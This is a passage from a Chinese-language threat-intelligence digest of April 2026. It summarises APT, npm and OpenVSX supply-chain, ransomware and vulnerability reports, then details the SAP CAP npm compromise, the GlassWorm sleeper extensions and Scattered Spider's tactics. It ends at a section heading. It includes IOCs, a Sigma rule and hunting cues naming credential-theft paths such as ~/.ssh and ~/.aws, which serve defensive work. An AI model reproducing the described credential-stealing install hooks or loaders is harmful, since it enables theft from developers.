BlueNoroff组织针对Web3/加密货币行业发起定向攻击，通过伪造Calendly会议邀请和拼写错误的Zoom链接诱导受害者进入虚假会议页面，窃取其摄像头视频作为后续诱饵，并利用ClickFix技术诱骗用户复制执行恶意PowerShell命令，进而部署内存后门窃取Telegram会话、浏览器凭证和加密货币钱包密钥，同时通过AI生成虚假头像和深度伪造视频增强欺骗性，最终实现长期持久化控制和资产窃取。

与Lazarus有关联的 npm 恶意软件攻击活动涉及 108 个恶意软件包

披露时间：2026年4月24日

情报来源：https://panther.com/blog/inside-dprk%E2%80%99s-npm-malware-factory-108-packages-261-versions-and-a-31-day-campaign-wave

相关信息：

Panther威胁研究团队在约30天内监控、聚类并追踪了一场朝鲜（DPRK）关联的npm恶意软件活动，该活动共涉及108个恶意包和261个版本，构成一个高度工业化的恶意软件工厂。攻击者利用BeaverTail恶意软件，通过"Contagious Interview"（传染性面试）模式，以虚假招聘面试为诱饵，诱导开发者下载并执行恶意代码。这一活动属于朝鲜更广泛供应链攻击的一部分，与Lazarus集团相关，其恶意包伪装成合法开发工具，在开发者调用看似正常的功能时触发恶意载荷，窃取浏览器数据、密码管理器信息及加密货币钱包凭证。该活动横跨npm、PyPI、Go、Rust等多个开源生态，自2025年初以来已识别超过1,700个恶意包。

Kimsuky组织针对处方药公司进行攻击

披露时间：2026年4月27日

情报来源：https://wezard4u.tistory.com/429764

相关信息：

Kimsuky组织利用伪装成Excel文档的LNK文件（文件名伪装为制药公司ERP规格书）实施攻击，该LNK文件内嵌诱饵XLSX文档、计划任务XML以及经XOR编码的PowerShell和JavaScript脚本；执行后释放文件至C:\sysconfigs目录并创建伪装成Avast浏览器更新的计划任务实现持久化，最终PowerShell脚本使用RC4加密通过Dropbox API上传受害主机信息并下载执行远程BAT命令。

ShadowBrokers泄露中的神秘引用揭示Stuxnet五年前的高精度软件破坏框架"fast16"

披露时间：2026年4月23日

情报来源：https://www.sentinelone.com/labs/fast16-mystery-shadowbrokers-reference-reveals-high-precision-software-sabotage-5-years-before-stuxnet/

相关信息：

SentinelLABS发现了一个可追溯至2005年的网络破坏框架fast16，其核心组件包括嵌入Lua 5.0虚拟机的载体svcmgmt.exe和内核驱动fast16.sys，后者通过在内核层拦截并修改可执行代码，专门针对高精度计算软件（如LS-DYNA、PKPM等工程仿真软件）实施浮点运算篡改，导致计算结果出现系统性偏差；该框架具备蠕虫式自我传播能力，并在ShadowBrokers泄露的NSA文件中被标记为“Nothing to see here – carry on”。

蔓灵花组织使用NUITKA打包的python样本进行投递

披露时间：2026年4月29日

情报来源：https://mp.weixin.qq.com/s/gbir8fE-pjchPbwY4y-NRA

相关信息：

蔓灵花（APT-C-08）组织近期利用NUITKA打包的Python样本作为初始载荷，通过下载执行后门组件获取CMD命令控制权限，进而部署文件窃密组件（监控存储设备变更并同步文件至C2）、Remcos远控后门及Python环境，实现对政府、国防等目标的定向入侵和数据窃取。

Lazarus 利用人工智能将对开发者的攻击产业化

披露时间：2026年4月22日

情报来源：https://expel.com/blog/inside-lazarus-how-north-korea-uses-ai-to-industrialize-attacks-on-developers/

相关信息：

Expel发现并持续追踪一个被评估为高置信度朝鲜国家支持的APT子群HexagonalRodent（别名Famous Chollima子集），该组织利用生成式AI大规模构建虚假招聘公司和钓鱼网站，通过VS Code tasks.json和代码后门植入BeaverTail、OtterCookie和InvisibleFerret恶意软件，专门针对Web3开发者实施加密货币钱包窃取，三个月内窃取约1200万美元数字资产，并首次被观察到通过fast-draft VS Code扩展实施供应链攻击。

攻击行动或事件情报

GlassWorm 恶意软件通过 73 个 OpenVSX "沉睡者"扩展卷土重来

披露时间：2026年4月28日

情报来源：https://mp.weixin.qq.com/s/zXeY_HXWNDydGbryxWkvVA

相关信息：

GlassWorm在OpenVSX扩展市场发起大规模供应链攻击，通过73个休眠扩展（至少6个已激活）采用“良性首发-信任积累-更新投毒”策略，利用瘦加载器从GitHub拉取恶意载荷或执行原生.node模块，动态窃取开发者的加密货币钱包、云凭证和SSH私钥，标志着其战术从硬编码恶意代码演进为生命周期管理式攻击。

PhantomRPC：Windows RPC 中的一种新的权限提升技术

披露时间：2026年4月24日

情报来源：https://securelist.com/phantomrpc-rpc-vulnerability/119428/

相关信息：

Securelist发现Windows RPC架构中存在一个设计缺陷，允许具有SeImpersonatePrivilege权限的进程通过部署伪造的RPC服务器（模仿如TermService等默认禁用或不可用服务的接口和端点），诱使高权限客户端发起高模拟级别的RPC调用，从而模拟客户端身份将权限提升至SYSTEM或管理员级别；微软评估该漏洞为中等严重性且未分配CVE，决定不立即修补，组织可通过ETW监控RPC异常并启用对应服务来缓解风险。

UNC6692 利用社会工程学部署定制恶意软件套件

披露时间：2026年4月24日

情报来源：https://cloud.google.com/blog/topics/threat-intelligence/unc6692-social-engineering-custom-malware/

相关信息：

UNC6692组织通过冒充IT服务台在Microsoft Teams发送钓鱼链接，诱导受害者下载AutoHotKey脚本安装SNOWBELT浏览器扩展，进而部署SNOWGLAZE隧道和SNOWBASIN后门，执行内网扫描、凭据窃取（LSASS转储）、传递哈希横向移动至域控制器，最终使用FTK Imager提取NTDS.dit并外传，同时利用钓鱼页面骗取用户凭证。

UAT-4356 针对 Cisco Firepower 设备的目标

披露时间：2026年4月23日

情报来源：https://blog.talosintelligence.com/uat-4356-firestarter/

相关信息：

UAT-4356利用CVE-2025-20333和CVE-2025-20362漏洞针对Cisco Firepower设备的FXOS系统，植入FIRESTARTER后门；该后门通过修改CSP_MOUNT_LIST实现瞬态持久化（仅限软重启），注入LINA进程并替换WebVPN XML处理函数，解析特定前缀后执行任意shellcode，其技术能力与Rayliniator的第三阶段载荷高度重叠。

供应链攻击永无眠：SAP CAP & Cloud MTA npm 供应链攻击事件报告

披露时间：2026年4月29日

情报来源：https://mp.weixin.qq.com/s/gaeeRzgxg-E_9G6_vtfO_g

相关信息：

攻击者通过污染SAP CAP生态中的四个npm官方包（如@cap-js/sqlite等），在安装时利用preinstall钩子从GitHub下载Bun运行时执行高度混淆的execution.js，该载荷会窃取GitHub、npm、AWS、Azure、Kubernetes等凭证并通过GitHub提交伪装外传，同时修改包文件实现自传播，影响开发者本地环境和CI/CD流水线，此次攻击与Shai-Hulud活动手法一致。

恶意代码情报

VECT：设计为勒索软件，意外成为数据擦除器

披露时间：2026年4月28日

情报来源：https://research.checkpoint.com/2026/vect-ransomware-by-design-wiper-by-accident/

相关信息：

Check Point Research对2025年12月出现的RaaS（勒索软件即服务）项目VECT 2.0进行深度技术分析，发现其存在一个致命的加密实现缺陷，使其从设计上的勒索软件意外成为数据擦除器。该软件基于libsodium库使用ChaCha20-IETF流密码（而非其广告宣称的ChaCha20-Poly1305 AEAD），针对Windows、Linux和ESXi三个平台采用统一的代码库。当处理大于131,072字节（128KB）的文件时，VECT将文件分为四个区块进行加密，每个区块生成一个独立的12字节随机nonce，但所有nonce被写入同一个共享缓冲区，导致前三个nonce在循环中被覆盖，最终仅第四个nonce被保存到文件末尾。由于ChaCha20-IETF解密需要精确的nonce匹配，这意味着任何大于128KB的文件中，前三个四分之一的区块数据永久不可恢复，包括VM磁盘、数据库、文档和备份等企业关键资产。该缺陷存在于所有公开可用的VECT版本中，且早于2.0版本就已存在。

M3rx勒索软件：揭秘新型泄露网站攻击者和Go加密器

披露时间：2026年4月27日

情报来源：https://www.derp.ca/research/m3rx-ransomware-go-encryptor/

相关信息：

M3rx是一个新兴的勒索软件团伙，拥有泄密网站和Tox联系方式，其Windows加密器使用Go编写，通过X25519密钥交换和AES-CTR加密文件内容，每文件AES密钥经AES-GCM包装后存入0x400字节的尾注中，默认仅加密文件1%的内容（可配置），加密后文件重命名为随机16字符并添加.8hmlsewu扩展名，释放RECOVERY_NOTES.TXT赎金票据，清空回收站并在执行后通过PowerShell自删除。

TryNodeUpdate 将 GitHub 和 BSC 转换为 TCP 控制通道

披露时间：2026年4月24日

情报来源：https://www.derp.ca/research/trynodeupdate-github-node-bsc-contract-c2/

相关信息：

TryNodeUpdate是一个Windows恶意软件链，通过PowerShell从GitHub获取Node.js控制器，控制器调用BNB智能合约解析出TCP后端地址，连接后下载本地辅助程序rpc.exe；该辅助程序同样通过合约获取后端，建立原始TCP控制通道（JSON格式新行分隔），支持心跳、文件上传和执行完整JS载荷。

Morpheus：一款与IPS Intelligence有关的新型间谍软件

披露时间：2026年4月23日

情报来源：https://osservatorionessuno.org/blog/2026/04/morpheus-a-new-spyware-linked-to-ips-intelligence/

相关信息：

Morpheus是一款可能由意大利开发的Android间谍软件，通过伪装成Fastweb ISP的钓鱼短信诱导安装，利用无障碍服务和ADB自动授权、禁用摄像头/麦克风指示灯、绕过生物识别添加WhatsApp配对设备，并具备录屏、录音及执行系统命令等能力；其部分基础设施关联IPS Intelligence及Rever Servicenet、Iris Telecomunicazioni等公司。

漏洞情报

GNU nano 软件中存在CVE-2026-40556漏洞

披露时间：2026年4月28日

情报来源：https://cert.pl/en/posts/2026/04/CVE-2026-40556/

相关信息：

GNU nano在创建用户~/.local目录时使用了过于宽松的权限（0777），当系统umask较为宽松（如容器环境或umask设置为0）时会导致该目录成为全局可写，本地攻击者可利用竞争窗口在更严格的子目录创建前写入恶意文件；该漏洞影响2.9.1至9.0以下版本，已在nano 9.0中修复。

APT28 零日漏洞补丁不完整导致 CVE-2026-32202 的出现

披露时间：2026年4月23日

情报来源：https://www.akamai.com/blog/security-research/2026/apr/incomplete-patch-apt28s-zero-day-cve-2026-32202

相关信息：

APT28利用恶意LNK文件中的Control Panel组件路径触发远程DLL加载，绕过SmartScreen实现远程代码执行；微软在修复该漏洞（CVE-2026-21510）时虽增加了信任验证，但仍留下零点击认证强制漏洞（CVE-2026-32202）：当资源管理器渲染恶意LNK文件时，会因图标提取而自动解析UNC路径并建立SMB连接，导致受害者NTLM哈希发送至攻击者服务器。

点击阅读原文至ALPHA 9.3

即刻助力威胁研判

阅读原文

跳转微信打开

供应链攻击永无眠：SAP CAP & Cloud MTA npm 供应链攻击事件报告

Wed, 29 Apr 2026 22:40:00 +0800

原创威胁情报中心 2026-04-29 22:40 四川

这是一起针对 SAP CAP（Cloud Application Programming Model）和 Cloud MTA（Multi-Target Application）生态的精准 npm 供应链攻击。攻击者通过劫持/污染 SAP 官方维护的 npm 包，在安装阶段注入恶意引导程序，最终执行高度混淆凭证窃取与自传播框架。

事件概述

这是一起针对 SAP CAP（Cloud Application Programming Model）和 Cloud MTA（Multi-Target Application）生态的精准 npm 供应链攻击。攻击者通过劫持/污染 SAP 官方维护的 npm 包，在安装阶段（preinstall 钩子）注入恶意引导程序，最终执行一个 11.7 MB 的高度混淆凭证窃取与自传播框架。
影响范围集中在开发者本地环境和 CI/CD 流水线（GitHub Actions、云凭证等），属于“中小规模但高影响”攻击（Aikido 原话）。

事件时间线

• 2026年4月29日 UTC 上午–中午：恶意版本陆续发布。
• 同日下午：Socket Security 率先在 X 上公开警报（用户提供的推文）。
• 同日下午：Aikido Security 发布博客，提供完整技术拆解、IOCs 和检测工具。
事件仍在快速发展中，npm 官方已 unpublish 部分恶意版本（尤其是 @cap-js/sqlite@2.2.2）。

受影响包及影响范围

包名称	恶意版本	每周下载量（约）	用途
mbt	1.2.48	52,000	SAP Cloud MTA 构建工具
@cap-js/sqlite	2.2.2	250,000	CAP 本地 SQLite 集成（最常用）
@cap-js/postgres	2.2.2	10,000	CAP PostgreSQL 集成
@cap-js/db-service	2.10.1	260,000	CAP 数据库服务核心

这些包是 SAP BTP 开发者、CAP Node.js 项目、MTA 部署流水线 的核心依赖。任何在 4 月 29 日暴露窗口内执行 npm install 的环境均可能感染。

攻击技术细节（Socket + Aikido 整合）

• 入口：恶意版本在 package.json 中新增 "preinstall": "node setup.mjs" 脚本（此前这些 SAP 官方包从未使用 preinstall）。
• 第一阶段（setup.mjs）：Bun 运行时引导程序。

• 检测 OS/架构 → 从 GitHub Releases 下载 Bun v1.3.13 ZIP（未经验证 HTTP 下载）。
• 解压并立即执行 execution.js。

• 第二阶段（execution.js）：11.7 MB 混淆 payload（使用 ctf-scramble-v2 字符串混淆）。

• 行为特征：

• 检测 CI 环境 → 非 CI 机器上 daemonize（后台驻留）。
• 跳过俄罗斯 locale（可能规避特定沙箱）。
• 凭证窃取（极全面）：

• GitHub token（gh auth token）
• npm token（~/.npmrc）
• AWS（STS、Secrets Manager、SSM）
• Azure（订阅、Key Vault）
• GCP（项目身份、Secret Manager）
• Kubernetes service account token
• 本地工具配置（Claude AI、MCP、Signal、Electrum、VPN 等）
• GitHub Actions runner 上通过嵌入式 Python 内存 dump 提取 secrets

• 数据外传：使用 AES-256-GCM + RSA 加密，通过 GitHub 死投（commit messages / public repos） 外传（伪装成 “chore: update dependencies” 提交，作者显示为 claude@users.noreply.github.com）。
• 自传播：修改 package tarballs、注入 GitHub workflows，关键词 “OhNoWhatsGoingOnWithGitHub” 和 “A Mini Shai-Hulud has Appeared”。

关键 IOCs（Aikido 提供）：

• 文件：setup.mjs（SHA256: 4066781fa830224c8bbcc3aa005a396657f9c8f9016f9a64ad44a9d7f5f45e34）
• 文件：execution.js（SHA256: 6f933d00b7d05678eb43c90963a80b8947c4ae6830182f89df31da9f568fea95）
• 字符串：A Mini Shai-Hulud has Appeared、OhNoWhatsGoingOnWithGitHub、ctf-scramble-v2、tmp.987654321.lock
• GitHub 搜索关键词：OhNoWhatsGoingOnWithGitHub（commits）或仓库描述含 “A Mini Shai-Hulud has Appeared”
• Bun 下载域名：github.com/oven-sh/bun/releases/download/bun-v1.3.13/

威胁归因及与 Shai-Hulud 的关联

Aikido 将其明确归类为 Mini Shai-Hulud，与 2025 年 Shai-Hulud V1（chalk/debug 等 18 个包）和 V2（自传播蠕虫）手法高度一致（install-time 执行 + 凭证窃取 + GitHub 传播）。本次规模更小（仅 4 个包），但 payload 更成熟、专业化，针对企业开发者/CI 环境优化。暂无公开威胁演员归因，但手法与此前 Axios、TeamPCP 等北韩相关活动有相似性。

立即缓解与检测建议（优先级最高）

1. 审计：

• npm ls mbt @cap-js/sqlite @cap-js/postgres @cap-js/db-service
• 搜索项目中 setup.mjs、execution.js、preinstall 脚本

2. 清理：

• 删除 node_modules + lockfile → npm ci --ignore-scripts 或切换 pnpm
• 检查 4月29日构建日志（Bun 下载、PowerShell 执行）

3. 响应：

• 立即轮换所有 GitHub、npm、云凭证、Kubernetes token
• GitHub 搜索上述关键词，检查可疑 commits / repos

4. 长期防护：

• 使用 Aikido Safe Chain / Socket.dev / StepSecurity 等 SCA 工具
• CI 中强制 --ignore-scripts
• 监控 SAP Security Patch Day + npm unpublish 公告

Aikido 评估：虽然包数量少，但因目标是 SAP 开发者/CI 环境，“潜在影响极高”。

此事件再次证明 npm 供应链攻击已成为常态，尤其针对企业框架如 SAP CAP。Socket 负责快速警报，Aikido 提供了目前最完整的 payload 逆向和 IOC 列表。

参考链接

[1].https://www.aikido.dev/blog/mini-shai-hulud-has-appeared
[2].https://x.com/SocketSecurity/status/2049479949644374507

点击阅读原文至ALPHA 9.3

即刻助力威胁研判

阅读原文

跳转微信打开

良性首发-信任积累-更新投毒：GlassWorm 恶意软件通过 73 个 OpenVSX "沉睡者"扩展卷土重来

Tue, 28 Apr 2026 11:37:00 +0800

原创威胁情报中心 2026-04-28 11:37 北京

GlassWorm 威胁活动近期在 OpenVSX 开源扩展生态中爆发新一轮大规模供应链攻击。根据 Socket 安全团队及多方情报交叉验证，攻击者于 2026 年 4 月向 OpenVSX 注册中心提交了 73 个"休眠（Sleeper）"恶意扩展，紧随 3 月份 72 个恶意包的第二波攻势。

一、事件概述

GlassWorm 威胁活动近期在 OpenVSX 开源扩展生态中爆发新一轮大规模供应链攻击。根据 Socket 安全团队及多方情报交叉验证，攻击者于 2026 年 4 月向 OpenVSX 注册中心提交了 73 个"休眠（Sleeper）"恶意扩展，紧随 3 月份 72 个恶意包的第二波攻势。其中至少 6 个扩展已被激活并成功投递恶意载荷，其余处于潜伏状态等待后续更新触发。

本次攻击标志着 GlassWorm 战术体系的重大演进：攻击者彻底放弃早期直接在扩展源码中硬编码恶意代码或滥用不可见 Unicode 字符的粗糙手法，转而采用 "良性首发-信任积累-更新投毒" 的生命周期模型。恶意扩展仅作为"瘦加载器（Thin Loader）"，通过运行时从 GitHub 拉取辅助 VSIX 包、加载平台原生 .node 模块或执行高度混淆的解密脚本，动态获取核心窃密组件。攻击目标明确指向开发者工作站，旨在批量窃取加密货币钱包、云凭证、访问令牌及 SSH 私钥。鉴于供应链攻击的穿透性与开发者环境的高权限属性，该事件威胁等级评定为 High。

二、技术细节分析

1. 休眠架构与生命周期管理

攻击者利用扩展市场的审核机制盲区，采用典型的 Sleeper Malware 架构：

阶段一（上架期）
扩展包仅包含基础 UI 组件、静态资源或无害占位逻辑，通过市场自动扫描与人工初筛。
阶段二（信任期）
通过克隆流行扩展（如 VS Code 土耳其语语言包）的图标、命名与描述进行视觉欺骗（Typosquatting），配合新注册的 GitHub 账户（仅维护 1-2 个公开仓库作为掩护）积累下载量与用户信任。
阶段三（激活期）
通过标准扩展更新通道推送包含恶意加载器的版本，利用开发者"默认信任已安装扩展自动更新"的心理模型完成驻留。

2. 动态载荷投递机制（Thin Loader 架构）

为规避静态沙箱检测与代码签名验证，加载器采用多模态动态加载技术：

GitHub 托管 VSIX 注入
运行时通过 CLI 命令（如 code --install-extension ）静默安装托管于 GitHub 的二级 VSIX 包，实现模块化解耦。
原生模块滥用（.node）
捆绑平台特定的编译型 .node 文件（据外部情报分析，部分变体使用 Zig 语言编译的 Dropper）。原生模块可绕过 Node.js/JS 沙箱限制，直接调用系统 API 进行文件系统遍历、进程注入与持久化。
运行时混淆解密
部分变体依赖重度混淆的 JavaScript，通过字符串变形、控制流平坦化与动态 eval()/Function 构造器在内存中解密核心逻辑。内置加密或冗余备用 C2 URL，确保单点失效不影响载荷获取。

3. 跨平台与环境适配

扩展通过读取 process.platform 与 process.arch 动态选择对应 .node 二进制或混淆脚本，支持 Windows、Linux 与 macOS。macOS 变种还结合了木马化加密货币钱包客户端的辅助投递，形成多路径覆盖。

三、攻击链还原（MITRE ATT&CK 映射）

攻击阶段	ATT&CK 技术编号	技术名称	战术实现描述
资源筹备	`T1583.006` / `T1585.003`	获取基础设施/开发账户	批量注册 GitHub 账户，伪造元数据，准备 `.node` 编译链与混淆引擎。
初始访问	`T1195.002`	供应链攻击：软件供应链	将休眠扩展上传至 OpenVSX Registry，利用官方分发渠道触达目标。
执行	`T1059.006` / `T1106`	命令行与脚本/原生 API	通过 IDE 扩展宿主进程 (`extensionHost`) 执行 JS 混淆代码或直接调用 `.node` 原生模块。
持久化	`T1547.001`	启动项执行	利用 IDE 扩展机制实现每次编辑器启动时自动加载，无需修改系统注册表或 cron。
防御规避	`T1027` / `T1036.005` / `T1599`	混淆/伪装/规避安全控制	首版无恶意特征；运行时解密；克隆合法扩展发布者标识与视觉元素；延迟触发逻辑。
凭证收集	`T1552.001` / `T1552.004`	凭据发现：本地存储/云凭证	扫描 `~/.ssh`, `~/.aws/credentials`, `~/.config/Code/User/globalStorage`, 浏览器钱包目录。
数据外传	`T1041` / `T1567`	加密通道/收集后外传	通过 HTTPS 将加密后的钱包种子、API Key 传至攻击者控制的 C2 节点（域名/动态 IP 轮换）。

四、威胁行为体画像

维度	分析结论
身份与组织	GlassWorm 并非单一漏洞利用团伙，而是具备工程化流水线能力的供应链攻击组织。其战术迭代速度（月度级波浪式攻击）与多生态覆盖（npm, GitHub, VSCode, OpenVSX）表明背后有专职开发、运维与情报团队支撑。
核心动机	经济利益驱动为主。直接目标为加密货币资产窃取与高价值开发者凭证（云 API、Git Token、CI/CD 权限）收割。窃取的凭证极可能用于二次勒索、代码库投毒或黑市交易，具备明显的"财务型 APT"特征。
技术能力	高。熟练掌握跨平台编译（Zig/C++）、JS 混淆工程、供应链分发机制、市场审核规避策略。采用"瘦加载器+动态拉取"架构，体现对现代端点检测（EDR）与静态沙箱的深刻认知。
目标画像	全栈开发者、DevOps 工程师、开源贡献者、加密资产持有者。偏好使用 VS Code/OpenVSX 生态，对扩展更新缺乏深度审计习惯。
历史活动轨迹	2024年10月首次曝光 → 2025年横向渗透至 npm/GitHub/macOS → 2026年3月（72包）测试"休眠"策略 → 2026年4月（73包）规模化部署并引入原生模块。攻击半径持续扩大，隐蔽性呈指数级提升。

五、IOC 深度分析

由于 GlassWorm 采用动态载荷与高频更新策略，传统静态 IOC（固定 Hash/IP）生命周期极短（通常 <72 小时）。本次分析聚焦 行为型与环境型 IOC，更适用于企业级威胁狩猎：

1. 扩展元数据异常

发布者标识不匹配
扩展包 publisher 字段与 displayName/icon 不一致，或与官方同名扩展的 unique identifier 存在细微差异。
GitHub 仓库掩护特征
托管载荷的 GitHub 账户注册日期 < 90 天，仓库数量 ≤ 2，无 Star/Fork 互动，仅包含 .vsix 或编译产物。

2. 运行时行为指纹

CLI 静默安装
node 或 extensionHost 进程执行 code --install-extension https://raw.githubusercontent.com/... 或类似下载+安装命令序列。
原生模块异常加载
非 Node.js 项目目录中出现 .node 文件，且由 IDE 扩展进程 dlopen() 加载；该模块导出函数包含文件系统遍历或网络请求逻辑。
高熵混淆特征
扩展主 JS 文件包含超长 Base64/Hex 编码块、动态字符串拼接、atob()/Buffer 滥用，且无合法业务逻辑对应。

3. 目标访问行为

非常规进程读取敏感目录
extensionHost 或子进程访问 ~/.ssh/id_*, ~/.aws/, ~/.kube/config, 浏览器扩展存储路径（如 Default/Local Extension Settings）。
隐蔽外传流量
IDE 进程向非官方域名发起 HTTPS POST，内容包含 Authorization、PRIVATE_KEY 或 mnemonic 等关键字段（需结合网络代理日志）。

狩猎建议：在 EDR 中配置基于进程树与文件访问的关联规则；在流量侧对 code 进程的非市场域名出站连接进行 TLS SNI 或 JA3 指纹监控。

六、影响评估

评估维度	详细分析
影响范围	OpenVSX 作为 Eclipse Theia、Gitpod、GitLab Web IDE 及部分 JetBrains 插件的底层注册中心，其污染可间接波及多家企业级开发平台与云 IDE 服务商。
业务风险	高危。开发者环境拥有生产级权限（CI/CD Token、云控制台、代码仓库 Write 权限）。凭证泄露将直接导致供应链下游投毒、云资源劫持、源代码窃取或加密资产归零。
行业靶点	软件开发、金融科技/区块链、云原生企业、开源基金会、外包开发团队。加密货币开发者与 Web3 项目贡献者为高优先级目标。
暴露面扩大因素	"休眠"策略导致大量已安装扩展成为定时炸弹；开发者普遍缺乏扩展版本回滚与差异审计习惯；部分企业未对 IDE 实施网络隔离或扩展白名单策略。

七、检测与响应建议

1. 检测规则思路

Sigma 规则示例（进程与 CLI 监控）：

title: IDE Extension Host Spawning VSIX Installer via GitHub
logsource: process_creation
detection:
  selection:
    ParentImage|endswith: 'node.exe'  # 或 code-insiders/node/extensionHost
    Image|endswith: 'code.exe'
    CommandLine|contains|all:
      - '--install-extension'
      - 'github.com'
      - 'raw.githubusercontent.com'
  condition: selection
level: high

YARA 规则思路（混淆 JS 与 .node 特征）：

扫描高熵字符串块（entropy > 6.5）+ 动态执行关键字（eval|Function|vm.runInThisContext）+ 网络请求库调用（axios|node-fetch|https.request）。
扫描 .node 模块的 ELF/PE 头，匹配特定节区名称（如 .rsrc 中隐藏配置）或导出符号表包含 steal, wallet, token 等变体（需配合 AI 辅助模式匹配）。

网络检测：

监控 IDE 进程向 raw.githubusercontent.com 发起的 .vsix 或 .tar.gz 下载请求，对比 OpenVSX 官方更新源域名差异。

2. 应急响应措施

隔离与清理
立即卸载 Socket 公布的 73 个扩展清单；清理 ~/.vscode/extensions 与 ~/.openvsx 缓存目录。
凭证轮换（强制）
假设已沦陷，立即轮换所有 SSH 密钥、Git Token、AWS/GCP/Azure Access Key、数据库密码及加密货币钱包助记词。
主机取证
使用 EDR 回溯 extensionHost 进程树，检查是否存在持久化计划任务、注册表修改或隐藏账户；提取内存中的解密后载荷样本。
流程加固
实施 IDE 扩展企业级白名单；禁用自动更新，强制人工审核变更日志；对 OpenVSX/npm 依赖实施 SBOM 追踪与签名验证。

八、未来趋势研判

战术常态化与架构升级
"休眠供应链"已成为高级财务型攻击的标准配置。未来载荷将进一步向 WASM（WebAssembly） 或 Rust/Zig 编译的二进制 迁移，利用跨平台兼容性与更难逆向的特性对抗静态分析。动态加载将结合 AI 生成的多态混淆，实现"一机一密"。
生态横向渗透
攻击者将加速复制该模型至 PyPI、RubyGems、Cargo、Maven 等包管理器。针对 Go/Java 生态的供应链投毒将增加 vendor/ 目录篡改与模块替换手法。
防御博弈升级
扩展市场将引入 动态沙箱更新验证（对比更新前后代码 Diff）、发布者身份强校验与行为基线监控。攻击者将采用 条件触发器（如仅当检测到特定地理 IP、企业域名后缀或反沙箱环境时才激活载荷）以延长存活期。
战略建议
组织需从"信任默认依赖"转向 "零信任依赖链"。建立自动化 SBOM 监控、实施 IDE 网络微隔离、引入扩展行为审计代理（Extension Behavior Agent），并将开发者工作站纳入与生产服务器同等级的威胁检测体系。供应链安全已从代码审计扩展至 全生命周期运行时监控。

点击阅读原文至ALPHA 9.3

即刻助力威胁研判

阅读原文

跳转微信打开

Scattered Spider核心成员认罪：深度解析以英语母语为主的网络犯罪组织的战术演进与地缘关联

Mon, 27 Apr 2026 14:43:00 +0800

原创威胁情报中心 2026-04-27 14:43 北京

2024年6月，苏格兰籍威胁行为体Tyler Robert Buchanan在西班牙被捕，后于2024年11月被美方正式起诉。2025年，美国司法部正式宣布该成员对参与Scattered Spider网络犯罪组织的相关指控认罪。

事件概述

2024年6月，苏格兰籍威胁行为体Tyler Robert Buchanan在西班牙被捕，后于2024年11月被美方正式起诉。2025年，美国司法部正式宣布该成员对参与Scattered Spider网络犯罪组织的相关指控认罪。这一进展标志着针对以经济利益为导向的英语母语黑客组织的国际执法行动进入新阶段。

Buchanan（24岁，苏格兰邓迪人）在美国法庭承认以下罪行：与同谋者合谋入侵数十家企业的网络系统，通过短信钓鱼攻击（Smishing）窃取员工凭证和个人身份信息，结合SIM卡交换攻击（SIM Swapping）绕过双因素认证，最终从美国受害者处窃取至少800万美元加密货币。

威胁行为体深度画像：Scattered Spider

Scattered Spider是一个以英语为母语、成员相对年轻的网络犯罪组织，因其独特的社工攻击风格而备受关注。该组织使用多个别名，包括Muddled Libra、Scatter Swine、Starfraud以及CrowdStrike命名的UNC3944。

奇安信威胁情报中心监测显示，Scattered Spider并非独立的网络犯罪实体，而是更广泛网络犯罪生态"The Com"的组成部分。这一归属关系解释了该组织为何能够获取高端攻击资源并与其他勒索软件组织形成协同关系。

成员特征

该组织成员以16-25岁的英语母语年轻人为主，这种年龄结构和语言背景使其在针对欧美企业的社工攻击中具有独特优势。相比传统的东欧网络犯罪组织，Scattered Spider成员更熟悉西方企业文化和工作流程，能够设计出更具欺骗性的钓鱼话术。

核心成员档案：

成员	年龄	国籍	状态	备注
Tyler Robert Buchanan	24	英国	认罪，待宣判	核心策划者
Noah Michael Urban	-	美国	已判10年	2024年8月判刑
Ahmed Hossam Eldin Elbadawy	23	美国（德克萨斯）	起诉在审	-
Evans Onyeaka Osiebo	20	美国（德克萨斯）	起诉在审	-
Joel Martin Evans	25	美国（北卡罗来纳）	起诉在审	-

攻击链深度解析：从凭证窃取到加密货币洗劫

Scattered Spider组织已形成一套成熟且高度自动化的攻击框架。

第一阶段：短信钓鱼（SMS Phishing）

攻击者向受害企业员工批量发送钓鱼短信，内容通常伪装成企业VPN异常、账户安全警告或密码过期提醒。原文披露的攻击手法显示，Buchanan及其同谋向目标公司员工发送数百条钓鱼短信，链接指向精心设计的钓鱼页面。

这些钓鱼页面高度模仿企业登录门户，包括伪造的合法品牌界面、SSL证书（部分情况下）以及与真实网站相似的域名。钓鱼工具包自动捕获员工输入的凭证，并实时传输至攻击者控制的Telegram频道。

技术特征：

使用多域名部署钓鱼基础设施，避免单点失效
Telegram频道作为数据中转站，降低被发现概率
针对不同目标定制钓鱼内容，提高可信度

第二阶段：凭证利用与横向移动

获取初始凭证后，攻击者快速识别可利用的账户，特别是具有高权限的管理账户。通过合法的VPN通道访问企业网络后，攻击者在内网进行侦察，识别关键资产和敏感数据存储位置。

这一阶段的目标不仅限于加密货币钱包，还包括：

知识产权和商业机密
员工个人身份信息（PII）
其他系统登录凭证
内部机密文档和通信记录

第三阶段：SIM卡交换攻击——绕过MFA的关键

SIM卡交换攻击是该组织攻击链的核心环节。当受害者的加密货币交易所账户或钱包启用了基于短信的双因素认证时，攻击者通过以下流程实现账户劫持：

信息收集：通过第一阶段窃取的PII确定受害者身份信息、手机号码运营商
社工联络：冒充受害者致电运营商客服，请求将号码转移至攻击者控制的SIM卡
验证码拦截：成功换卡后，所有短信验证码发送至攻击者设备
账户清空：使用拦截的验证码完成认证，重置钱包密码，转走所有资产

原文披露，执法部门在Buchanan的苏格兰住所发现的设备中包含多名受害者的姓名和地址信息，以及加密货币种子短语文件，直接证明其对SIM交换攻击的深度参与。

第四阶段：混币与变现

窃取的加密货币通过多层混币服务转移，攻击者精心设计交易路径以逃避区块链分析追踪。最终资金通过场外交易（OTC）或暗网市场转换为法币。

受害者画像与行业分布

根据多方信息交叉验证，Scattered Spider的攻击活动在2021年9月至2023年4月期间达到高峰，受害企业涵盖多个关键行业：

行业	代表性受害者	攻击影响
酒店与娱乐	MGM Resorts、Caesars	系统瘫痪、数据泄露
科技	Twilio、GitHub、Cloudflare	员工凭证泄露
通信	Mailchimp	用户数据外泄
零售	DoorDash、英国/美国零售企业	客户信息泄露
加密货币	虚拟货币服务商	数百万美元损失

该组织对MGM Resorts的攻击尤为引人注目。2023年9月，攻击者通过社工手段获取内部系统访问权限，导致赌场预订系统、酒店管理系统和忠诚度计划平台全面瘫痪，直接损失超过1亿美元。这一事件充分展示了Scattered Spider从凭证窃取到大规模企业入侵的能力跃升。

战术技术演变趋势：从"0ktapus"到专业攻击组织

